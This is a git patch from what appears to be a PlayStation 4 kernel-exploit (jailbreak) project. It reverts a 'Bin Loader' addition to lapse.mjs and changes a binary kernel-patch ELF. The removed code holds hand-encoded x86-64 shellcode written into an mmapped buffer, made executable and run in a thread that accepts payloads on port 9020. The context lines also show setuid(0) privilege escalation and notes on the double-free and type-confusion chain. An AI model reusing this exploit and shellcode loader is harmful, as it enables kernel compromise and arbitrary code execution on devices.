From 2abdc1c73f8364438560bee713a3a6e71ac02d3a Mon Sep 17 00:00:00 2001
From: Kameleon <77245601+kmeps4@users.noreply.github.com>
Date: Sat, 24 May 2025 13:00:24 -0600
Subject: [PATCH] Revert "Add Bin Loader "

---
 kpatch/900.elf | Bin 5288 -> 5288 bytes
 lapse.mjs      |  96 ++++++++++++++-----------------------------------
 2 files changed, 27 insertions(+), 69 deletions(-)

diff --git a/kpatch/900.elf b/kpatch/900.elf
index 8e6d0410b8644d6e271d333381ecd8c99f648c0c..a38fa6b29ce522f871cba606f666f29f17bcfd66 100644
GIT binary patch
delta 428
zcmZ3Xxk7V7g5d>51~7op3<3~-z|)cx79ewtAcVgLsE!lF-#GC)fBgXu&O;u(T@L^L
z|L0dY;Gz2e|G)qIN(YWNP5|ivg0$m}TY=086M&4JV8*e=LqPiVu|}<AF$VKvjk+M}
zcw;X&2Ux?g#`<l_46lzjI!G%qco-fye5{d83aB2a|HwLJh6yi^HU1S=2kCbdQI7)A
zdqu!pMo}=eRt!wVN`om~86XAJT9T0jbi?sR>w8uV{7T0UA8%A(6<}ln+UU`E=<QJ!
z29M5(8bFcbjXppU6cm$x3g~OD0s6}Z>?{Uwco+cLSAb&Qpkfk0+69O+CI<@23x)t?
zp8Ws+zW_+@0n%$GHwwy6ej#YVxMs4VkUZnJ&5lCsjEsJhJ%#l-1EAp;Fu76KoD&|Z
YlMf2pi(Y_+^$MsptU#J&vZ%;p0E6a<V*mgE

delta 406
zcmZ3Xxk7V7f?)?E0~o+)1_1~^;Au$;3y_&22;rvy)p3IO8z)}puRrL)dCH@Alf%FN
z|M?XTc&PsW|L;G)(t+b`6F_=^AnkbDRv>f21R!H4m~pJ_5RiU-ysej;1E%E2I%S3l
zFORj=Z&L=zI7lloco-fye5{R43anItRe+HRsMw?N(A%Rd3?7}+G=L(<+k||86v*Mn
z+pO<dG4LxLKRnq{P@nP3<U&DVQJMe$|E~jE!N4E^q+Nh`!{nKQ@)C1^?tKE3-2tTc
z0O>D4`T~%icu>ZYnE?_KAWtF#W(Fn(4yfl*#hDqvfin57pfh92WJMu)#&w$=h1eMx
p*(Q4m>vO_1aZGL$Hs^$g-{gbB_M#ooQ2hWkkrha@PZkxK3;^6zZvp@S

diff --git a/lapse.mjs b/lapse.mjs
index b176e5e..fb9eb7b 100644
--- a/lapse.mjs
+++ b/lapse.mjs
@@ -1594,9 +1594,7 @@ async function patch_kernel(kbase, kmem, p_ucred, restore_info) {
     log('setuid(0)');
     sysi('setuid', 0);
     log('kernel exploit succeeded!');
-    localStorage.ExploitLoaded="yes"
-    sessionStorage.ExploitLoaded="yes"
-    //alert("kernel exploit succeeded!");
+    alert("kernel exploit succeeded!");
 }
 
 
@@ -1644,64 +1642,6 @@ function setup(block_fd) {
     return [block_id, groom_ids];
 }
 
-function malloc(sz) {
-        var backing = new Uint8Array(0x10000 + sz);
-        nogc.push(backing);
-        var ptr = mem.readp(mem.addrof(backing).add(0x10));
-        ptr.backing = backing;
-        return ptr;
-    }
-
-    function malloc32(sz) {
-        var backing = new Uint8Array(0x10000 + sz * 4);
-        nogc.push(backing);
-        var ptr = mem.readp(mem.addrof(backing).add(0x10));
-        ptr.backing = new Uint32Array(backing.buffer);
-        return ptr;
-    }
-
-function runBinLoader() {
-    var payload_buffer = chain.sysp('mmap', 0x0, 0x300000, 0x7, 0x1000, 0xFFFFFFFF, 0);
-    var payload_loader = malloc32(0x1000);
-    var BLDR = payload_loader.backing;
-    BLDR[0]  = 0x56415741;  BLDR[1]  = 0x83485541;  BLDR[2]  = 0x894818EC;
-    BLDR[3]  = 0xC748243C;  BLDR[4]  = 0x10082444;  BLDR[5]  = 0x483C2302;
-    BLDR[6]  = 0x102444C7;  BLDR[7]  = 0x00000000;  BLDR[8]  = 0x000002BF;
-    BLDR[9]  = 0x0001BE00;  BLDR[10] = 0xD2310000;  BLDR[11] = 0x00009CE8;
-    BLDR[12] = 0xC7894100;  BLDR[13] = 0x8D48C789;  BLDR[14] = 0xBA082474;
-    BLDR[15] = 0x00000010; BLDR[16] = 0x000095E8;  BLDR[17] = 0xFF894400;
-    BLDR[18] = 0x000001BE; BLDR[19] = 0x0095E800;  BLDR[20] = 0x89440000;
-    BLDR[21] = 0x31F631FF; BLDR[22] = 0x0062E8D2;  BLDR[23] = 0x89410000;
-    BLDR[24] = 0x2C8B4CC6;  BLDR[25] = 0x45C64124;  BLDR[26] = 0x05EBC300;
-    BLDR[27] = 0x01499848; BLDR[28] = 0xF78944C5; BLDR[29] = 0xBAEE894C;
-    BLDR[30] = 0x00001000; BLDR[31] = 0x000025E8; BLDR[32] = 0x7FC08500;
-    BLDR[33] = 0xFF8944E7; BLDR[34] = 0x000026E8; BLDR[35] = 0xF7894400;
-    BLDR[36] = 0x00001EE8; BLDR[37] = 0x2414FF00; BLDR[38] = 0x18C48348;
-    BLDR[39] = 0x5E415D41; BLDR[40] = 0x31485F41; BLDR[41] = 0xC748C3C0;
-    BLDR[42] = 0x000003C0; BLDR[43] = 0xCA894900; BLDR[44] = 0x48C3050F;
-    BLDR[45] = 0x0006C0C7; BLDR[46] = 0x89490000; BLDR[47] = 0xC3050FCA;
-    BLDR[48] = 0x1EC0C748; BLDR[49] = 0x49000000; BLDR[50] = 0x050FCA89;
-    BLDR[51] = 0xC0C748C3; BLDR[52] = 0x00000061; BLDR[53] = 0x0FCA8949;
-    BLDR[54] = 0xC748C305; BLDR[55] = 0x000068C0; BLDR[56] = 0xCA894900;
-    BLDR[57] = 0x48C3050F; BLDR[58] = 0x006AC0C7; BLDR[59] = 0x89490000;
-    BLDR[60] = 0xC3050FCA;
-
-    chain.sys('mprotect', payload_loader, 0x4000, (0x1 | 0x2 | 0x4));
-
-    var pthread = malloc(0x10);
-    sysi('mlock', payload_buffer, 0x300000);
-
-    call_nze(
-        'pthread_create',
-        pthread,
-        0,
-        payload_loader,
-        payload_buffer
-    );
-
-    log('GoldHEN Already Loaded, BinLoader Is Ready. Send A Payload To Port 9020 Now');
-}
-
 // overview:
 // * double free a aio_entry (resides at a 0x80 malloc zone)
 // * type confuse a evf and a ip6_rthdr
@@ -1718,16 +1658,14 @@ export async function kexploit() {
     await init();
     const _init_t2 = performance.now();
 
+    // If setuid is successful, we dont need to run the kexploit again
     try {
-       chain.sys('setuid', 0);
-    } catch (e) {
-        localStorage.ExploitLoaded = "no";
-    }
-    
-    if (localStorage.ExploitLoaded === "yes" && sessionStorage.ExploitLoaded!="yes") {
-            runBinLoader();
-            return new Promise(() => {});
+        if (sysi('setuid', 0) == 0) {
+            log("Not running kexploit again.")
+            return;
+        }
     }
+    catch (e) {}
 
     // fun fact:
     // if the first thing you do since boot is run the web browser, WebKit can
@@ -1804,6 +1742,22 @@ export async function kexploit() {
     }
 }
 
+function malloc(sz) {
+        var backing = new Uint8Array(0x10000 + sz);
+        nogc.push(backing);
+        var ptr = mem.readp(mem.addrof(backing).add(0x10));
+        ptr.backing = backing;
+        return ptr;
+    }
+
+    function malloc32(sz) {
+        var backing = new Uint8Array(0x10000 + sz * 4);
+        nogc.push(backing);
+        var ptr = mem.readp(mem.addrof(backing).add(0x10));
+        ptr.backing = new Uint32Array(backing.buffer);
+        return ptr;
+    }
+
 
 kexploit().then(() => {
     
@@ -1828,4 +1782,8 @@ kexploit().then(() => {
         payload_buffer,
     );
 
+
+    
+
+
 })